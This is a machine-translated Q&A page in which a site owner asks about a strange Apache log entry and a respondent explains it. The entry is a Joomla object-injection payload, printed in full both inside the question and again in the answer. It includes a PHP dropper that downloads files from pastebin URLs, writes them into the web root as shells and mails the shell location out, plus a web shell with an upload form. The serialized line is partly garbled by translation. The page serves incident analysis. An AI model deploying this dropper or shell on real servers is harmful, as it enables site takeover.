MySQL注入尝试 - 如何从access.log复制?

时间:2017-03-22 04:28:00

标签: php sql security mysqli sql-injection

我最近一直致力于在我的生产Apache / PHP / MySQL Web应用程序中防止SQL注入。

为此,我经常浏览Apache访问日志以查找异常请求,如果我发现它们特殊(有人有更好的建议吗?),偶尔会尝试复制它们。

今天,我看到访问日志中出现了一个奇怪的日志。我看到HTTP引用存在,但我没有原始请求的匹配日志。 Apache错误日志中也没有匹配的日志,这意味着它“被服务器配置拒绝”。

这是奇怪的日志(base_64已解码):

169.239.180.100 - - [22 / Mar / 2017:04:01:37 +0000]“GET / HTTP / 1.1”200 13963“ - ”“} __ test | O:21:\”JDatabaseDriverMysqli \“:3 :{S:2:\ “FC \”,O:17:\ “JSimplepieFactory \”:0:{} S:21:\ “\ 0 \ 0 \ 0disconnectHandlers \”;一个:1:{I:0;一:2:{I 0,O:9:\ “了SimplePie \”:5:{S:8:\ “的sanitize \”,O:20:\ “JDatabaseDriverMysql \”:0:{} S:8: \“feed_url \”; s:3462:\“$ check = $ _SERVER ['DOCUMENT_ROOT']。 “/libraries/lol.php”; $ FP =的fopen( “$检查”, “W +”); 的fwrite($ FP,BASE64_DECODE('

<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);


$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);


?>

“)); FCLOSE($ FP); JFactory :: getConfig();退出\ “; S:19:\” cache_name_function \ “; S:6:\” 断言\ “; S:5:\” 缓存\“; B:1; S:11:\ “cache_class \”,O:20:\ “JDatabaseDriverMysql \”:0:{}} I:1; S:4:\ “INIT \”;}} S:13:\ “\ 0 \ 0 \ 0connection \” ; b:1;} \ XF0 \ XFD \ XFD \ XFD“

我尝试通过Postman复制此GET请求,但它被视为“无效的XMLHTTPRequest”。我不确定通常会对此进行测试吗?

我也不确定这是做什么(或尝试做什么)。任何有关此尝试(以及它是否可能成功)的信息/理论都将受到高度赞赏。

我认为这只是通过HTTP引用者将SQL注入某个“框架”的简单尝试,但我不是专家。提前感谢您的帮助。

1 个答案:

答案 0 :(得分:1)

这是我解码时的结果

<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

看起来您正在使用Joomla CMS。库文件夹lol.php中有一个文件,由脚本调用。另一个文件/libraries/joomla/wl.php也是被调用的恶意文件。此外,正在执行pastebin代码

<?php 
// name of the file is: i (it has no extension)
error_reporting(0);

if(isset($_GET["0"]))
    {
        echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';

echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";

?>

它正在将pastebin代码写入您的文件/libraries/joomla/jmail.php。

<强>结论:

如果您不使用Joomla CMS,则无需担心。如果是,那么你需要检查那些受影响的文件。可能的恶意文件会上传到您的服务器。

相关问题
最新问题